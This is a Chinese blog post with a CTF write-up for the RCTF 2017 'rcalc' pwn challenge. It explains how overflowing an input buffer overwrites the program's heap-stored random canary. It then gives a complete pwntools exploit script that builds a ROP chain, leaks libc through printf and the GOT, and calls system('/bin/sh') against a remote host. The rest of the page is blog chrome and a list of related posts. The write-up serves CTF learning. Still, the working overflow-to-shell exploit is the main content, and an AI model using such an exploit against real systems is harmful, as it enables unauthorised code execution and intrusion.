[XCTF-pwn] 30_xctf-3rd-RCTF-2017_rcalc

于 2022-03-09 20:30:00 发布
阅读量217 收藏
点赞数
分类专栏: CTF pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/123380076
版权

程序本身有溢出,未开pie,got表可写。但是calc有密码校验。

数据结构:

  1. 两个0x20块存计数器和指针
  2. 0x110块存输入数据
  3. 0x330块存使用的密码每次向后加一个提前放入

漏洞:

        指针下边界无限制可溢出写,每次会写入输入的数据,通过输入超过33个数覆盖密码区。

思路:

  1. 先溢出写入rop
  2. 向前移动输入块,清密码1(返回时候用)
  3. 选择退出,这时与当前密码指针重叠,可以绕过检查
  4. 退出后执行rop得到libc并重入
  5. 同1-4写入system(/bin/sh)

完整exp:

from pwn import *

local = 0
if local == 1:
    p = process('./pwn')
else:
    p = remote('111.200.241.244', 53010) 

libc_elf = ELF('/home/shi/buuctf/buuoj_2.23_amd64/libc6_2.23-0ubuntu10_amd64.so')
one = [0x45216, 0x4526a, 0xf02a4, 0xf1147 ]
libc_start_main_ret = 0x20830

elf = ELF('./pwn')
context.arch = 'amd64'

pop_rdi = 0x0000000000401123 # pop rdi ; ret
vuln_addr = 0x400fa2

'''
gef➤  heap chunks
Chunk(addr=0x603010, size=0x20, flags=PREV_INUSE)
    [0x0000000000603010     01 00 00 00 00 00 00 00 50 30 60 00 00 00 00 00    ........P0`.....]
Chunk(addr=0x603030, size=0x20, flags=PREV_INUSE)
    [0x0000000000603030     03 00 00 00 00 00 00 00 60 31 60 00 00 00 00 00    ........`1`.....]
Chunk(addr=0x603050, size=0x110, flags=PREV_INUSE)
    [0x0000000000603050     0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................]
Chunk(addr=0x603160, size=0x330, flags=PREV_INUSE)
    [0x0000000000603160     95 a2 45 44 5d 92 0b 38 62 a7 c3 69 e1 0e af 35    ..ED]..8b..i...5]
Chunk(addr=0x603490, size=0x20b80, flags=PREV_INUSE)  ←  top chunk
'''
#clear rand data 0x603160
def calc(a=0):
    p.sendlineafter(b"Your choice:", b'1')
    p.sendline(str(a).encode())
    p.sendline(b'0')
    p.send(b'yes'.ljust(0x10, b'\x00'))

context.log_level = 'debug'


# 0x20 
start = 0x401036
#1
p.sendlineafter(b"Input your name pls: ", b'A'*0x108+flat(0,0,pop_rdi,elf.got['__libc_start_main'],elf.plt['printf'],start))

for i in range(33):
    calc()
calc(0x331)
for i in range(1):
    calc()
p.sendlineafter(b"Your choice:", b'5')    
libc_base = u64(p.recvuntil(b'\x7f').ljust(8, b'\x00')) - libc_elf.sym['__libc_start_main']
libc_elf.address = libc_base
print('libc:', hex(libc_base))
#2
p.sendlineafter(b"Input your name pls: ", b'A'*0x108 + flat(0,0,pop_rdi, next(libc_elf.search(b'/bin/sh')), libc_elf.sym['system']))
for i in range(33):
    calc()
calc(0x331)
for i in range(1):
    calc()

p.sendlineafter(b"Your choice:", b'5')    

p.interactive()

石氏是时试
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Rcalc(xctf)
weixin_43868725的博客
08-30 345
0x0 程序保护和流程 保护: 流程: main() init_heap() qword_6020F8存放着第一个申请的chunk,qword_6020F0存放着第二个申请的chunk,*(qword_6020F8+8)存放着第三个申请的chunk,*(qword_6020F0+8)存放着第四个申请的chunk real_main() 程序没有开启canary保护,但是通过create_random()和get_random()实现了canary的功能。在输入name的时候没有限制长度,存在栈溢出。
攻防世界-PWN进阶区-1000levevls(XCTF 3rd-BCTF-2017)
weixin_44145820的博客
02-29 801
这道题是攻防世界上面一道六星的pwn题,比起之前的还是挺有难度,做完也有很大收获 题目分析 首先checksec查看开启的保护 可以看到这题比之前的题目多了一个PIE保护,下面就简单介绍一下什么是PIE PIE全称是position-independent executable,中文解释为地址无关可执行文件,该技术是一个针对代码段(.text)、数据段(.data)、未初始化全局变量段(.bs...
攻防世界pwn RCalc
PLpa的博客
02-22 443
需要知识:ROP,堆溢出 发现查询没开PIE和canary。 程序在最开始申请了几个堆空间,并不允许我们自己申请,而且整个程序并没有free的地方,所以常规的堆漏洞并不容易利用,这时候我们就继续往下看。 这里可以看到,主要功能函数处有一个没有输入限制的字符串,由此我们就联想到使用常规的ROP。 但是程序在主要功能函数中添加了随机数植入,构造了一个自定义的canary,我们只要覆盖了这个随机...
XCTF Normal_RSA
YenKoc的博客
04-14 966
这题本来算是很常规的rsa了,下载附件 发现有个公钥文件,还有一个加密文件,这种题之前有遇到一次,做法和这个类似,上次那个是用rsa的库,直接解的,这次直接用常规的,好像更简单,记录下模板 记事本打开那个公钥文件,放到在线网站上面解开。 n是十六进制的,拿去抓换成十进制的数字,然后分解p,q 写脚本跑就完事了 import rsa import binascii import sys imp...
攻防世界PWN之RCalc题解
seaaseesa的博客
11-19 1380
RCalc 首先,检查一下程序的保护机制,还不错,只开了NX 然后,我们用IDA分析 看到这,感觉像是堆的题,应该会很复杂。然而,我们再看看其他地方,发现这个函数只是在初始化时调用的,也不太可能会被利用,而且程序全程没有调用free函数 然后,我们瞧瞧其他函数,看到这里感觉好复杂,然而,它只是一个用来生成随机数的函数罢了 然后,我们继续看其他函数 这个样子,好像是can...
XCTF-HW-pipeline附件
11-09
附件
XCTF-RE】新手练习区-open-source.c
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/zgwso7
xctf_huaweicloud-qualifier-2020
05-31
xctf_huaweicloud-qualifier-2020写上去译文原始码类别名称网址分数解决了PWN cp 游戏 快速执行 Fastga mysqli 迷你人 nday_container_escape qemu-zzz 网络隐藏云我的1 我的2 派尔 网壳 :cross_mark: 杂项以太网 谁...
XCTF-RE】新手练习区-logmein
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ez5t60
XMan-MISC-诸葛建伟XCTF-public.pdf
12-04
MISC,中文即杂项,包括隐写,数据还原,脑洞、社会工程、与信息安全相关的大数据等。 竞赛过程中解MISC时会涉及到各种脑洞,各种花式技巧,主要考察选手的快速理解、学习能力以及日常知识积累的广度、深度。...
RCalc RCTF-2017
qq_41071646的博客
07-31 248
这个题目比较好玩的一点就是自己写了一个canary的保护 其实就是首先开了堆 然后随机值 然后 把随机值保存到堆里面 后来在取出来做对比 用一个canary 然后保存一个 类似栈结构 ++ --- 然后 根据 堆的知识以及调试可以知道 我们保存的结果可以溢出到堆里面 那么 我们直接修改就可以了 然后泄露一下就ok了 from pwn import * context.l...
RCTF-RCalc WP
qq_41252520的博客
07-28 605
保护 分析 IDA分析代码,部分函数名经过我的分析已被重置 这部分函数主要就是申请了两个,我称之为calc的结构,并给该结构中的buf成员申请空间。 这个函数很明显存在栈溢出,值得注意的是scanf("%s",v1)是以空格作为输入结束的标志,并且作者刻意实现了自定义的canary保护。在一开始随机一个数,存放在answer中,在尾部又从前面申请的calc结构中取出来进行对比 ...
PWN视角看待C函数——scanf
CoLin的pwn小屋
11-13 3148
scanf函数测试所用版本测试内容参数%d参数%u、%lld、%llu、%x、%llx、%f、%llf参数%c参数%s scanf函数是标准输入函数的一种,它的一些特性可以作为一些PWN题的利用空间。本文档记录对scanf函数的实验与分析的过程与结果。 scanf测试的重点是格式化的字符串。对于后面的参数来说,如果可以在之前修改对应于字符串的指针参数,那么可以实现任意地址写,这个不是scanf本身的特性,不做分析。 测试所用版本 gcc版本:gcc (Debian 10.3.0-12) 10.3.0,编译
Deep Coral源码(深度相关性学习)
07-25
Deep Coral(深度相关性学习)迁移学习网络资源 Deep Coral是一种先进的迁移学习技术,专注于通过学习源域和目标域之间的相关性来提高模型的泛化能力。这种方法在处理不同数据分布的问题时表现出色,尤其是在无监督领域自适应的场景中。 Deep Coral网络核心特点: 相关性学习 - Deep Coral通过学习源域和目标域特征之间的相关性,减少领域差异,提高模型的泛化能力。 无监督学习 - 该方法无需目标域的标签信息,即可实现有效的领域自适应,适合标签稀缺的场景。 灵活性 - 该网络结构灵活,可以适用于多种不同的迁移学习场景,包括但不限于图像分类、语义分割等。
codeforces round 961 (div. 2)
07-25
A题 思路:对角线上的个数为:n,n-1(2个),n-2(2个),n-3(2个),......,1(2个) AC代码: #pragma GCC optimize("O2") #pragma GCC optimize("O3") #include <bits/stdc++.h> using namespace std; #define int long long #define double long double typedef long long ll; typedef unsigned long long ull; typedef pair<int, int> pii; const int N = 1e5 + 5, M = 1e7 + 5, S = 1e6 + 5, inf = 0x3f3f3f3f3f3f3f3f, mod = 1e9 + 7; int n, k; void solve() { cin >> n >> k; vector<int> v; for (int i = n; i >= 1; i--) { if (i
毕业设计:基于Springboot的多媒体信息共享平台
07-25
随着信息时代的到来,传统武理多媒体信息共享管理方式的弊端日益显现。针对这些问题,本文分析了传统方式的不足,并采用计算机技术构建武理多媒体信息共享系统。通过查阅相关文献和研究国内外相关技术,本文提出了一种集作品信息管理与信息共享于一体的系统构建方案。 本系统采用B/S架构,结合Spring Boot框架和MySQL数据库技术,针对国内武理多媒体信息共享系统的现状进行开发。系统包含个人中心、用户管理、作品分类管理、作品信息管理、私聊信息管理、系统管理等多个功能模块。经过测试,本系统达到了设计目标,相较于人工管理方式,显著降低了武理多媒体信息共享管理的经济成本,并大幅提升了管理效率。
2022年河南省特岗教师招聘考试题(考生回忆版).pdf
07-25
2022年河南省特岗教师招聘考试题(考生回忆版).pdf2022年河南省特岗教师招聘考试题(考生回忆版).pdf2022年河南省特岗教师招聘考试题(考生回忆版).pdf2022年河南省特岗教师招聘考试题(考生回忆版).pdf2022年河南省特岗教师招聘考试题(考生回忆版).pdf2022年河南省特岗教师招聘考试题(考生回忆版).pdf2022年河南省特岗教师招聘考试题(考生回忆版).pdf2022年河南省特岗教师招聘考试题(考生回忆版).pdf2022年河南省特岗教师招聘考试题(考生回忆版).pdf2022年河南省特岗教师招聘考试题(考生回忆版).pdf2022年河南省特岗教师招聘考试题(考生回忆版).pdf2022年河南省特岗教师招聘考试题(考生回忆版).pdf2022年河南省特岗教师招聘考试题(考生回忆版).pdf2022年河南省特岗教师招聘考试题(考生回忆版).pdf2022年河南省特岗教师招聘考试题(考生回忆版).pdf2022年河南省特岗教师招聘考试题(考生回忆版).pdf2022年河南省特岗教师招聘考试题(考生回忆版).pdf2022年河南省特岗教师招聘考试题(考生回忆版)
b194红色革命文物征集管理系统-springboot+vue+elementui.zip(可运行源码+sql文件+文档)
最新发布
07-25
红色革命文物征集管理系统在对开发工具的选择上也很慎重,为了便于开发实现,选择的开发工具为Eclipse,选择的数据库工具为Mysql。以此搭建开发环境实现红色革命文物征集管理系统的功能。其中管理员管理用户,新闻公告。 红色革命文物征集管理系统是一款运用软件开发技术设计实现的应用系统,在信息处理上可以达到快速的目的,不管是针对数据添加,数据维护和统计,以及数据查询等处理要求,红色革命文物征集管理系统都可以轻松应对。 用户信息管理页面,此页面提供给管理员的功能有:用户信息的查询管理,可以删除用户信息、修改用户信息、新增用户信息,还进行了对用户名称的模糊查询的条件。文物信息管理页面,此页面提供给管理员的功能有:查看已发布的文物信息数据,修改文物信息,文物信息作废,即可删除,还进行了对文物信息名称的模糊查询 文物信息信息的类型查询等等一些条件。论坛信息管理页面,此页面提供给管理员的功能有:根据论坛信息进行条件查询,还可以对论坛信息进行新增、修改、查询操作等等。公告信息管理页面,此页面提供给管理员的功能有:根据公告信息进行新增、修改、查询操作等等。
基于Django+python编写开发的毕业生就业管理系统支持学生教师角色+db数据库(毕业设计新项目).zip
07-25
基于Django+python编写开发的毕业生就业管理系统支持学生教师角色+db数据库(毕业设计新项目).zip 【备注】 1、该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的,请放心下载使用!有问题请及时沟通交流。 2、适用人群:计算机相关专业(如计科、信息安全、数据科学与大数据技术、人工智能、通信、物联网、自动化、电子信息等)在校学生、专业老师或者企业员工下载使用。 3、用途:项目具有较高的学习借鉴价值,不仅适用于小白学习入门进阶。也可作为毕设项目、课程设计、大作业、初期项目立项演示等。 4、如果基础还行,或热爱钻研,亦可在此项目代码基础上进行修改添加,实现其他不同功能。 欢迎下载!欢迎交流学习!不清楚的可以私信问我! 基于Django+python编写开发的毕业生就业管理系统支持学生教师角色+db数据库(毕业设计新项目).zip基于Django+python编写开发的毕业生就业管理系统支持学生教师角色+db数据库(毕业设计新项目).zip基于Django+python编写开发的毕业生就业管理系统支持学生教师角色+db数据库(毕业设计新项目).zip基于Django+python编写开发的毕业生就业管理系统支持学生教师角色+db数据库(毕业设计新项目).zip基于Django+python编写开发的毕业生就业管理系统支持学生教师角色+db数据库(毕业设计新项目).zip基于Django+python编写开发的毕业生就业管理系统支持学生教师角色+db数据库(毕业设计新项目).zip基于Django+python编写开发的毕业生就业管理系统支持学生教师角色+db数据库(毕业设计新项目).zip基于Django+python编写开发的毕业生就业管理系统支持学生教师角色+db数据库(毕业设计新项目).zip基于Django+python编写开发的毕业生就业管理系统支持学生教师角色+db数据库(毕业设计新项目).zip
pure_color xctf
07-16
pure_color xctf是一个CTF比赛平台,致力于举办和推广网络安全竞赛。 pure_color xctf的目标是为安全爱好者和专业人士提供一个学习、切磋和交流的平台。这个平台上举办的比赛覆盖了各种网络安全领域,包括但不限于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值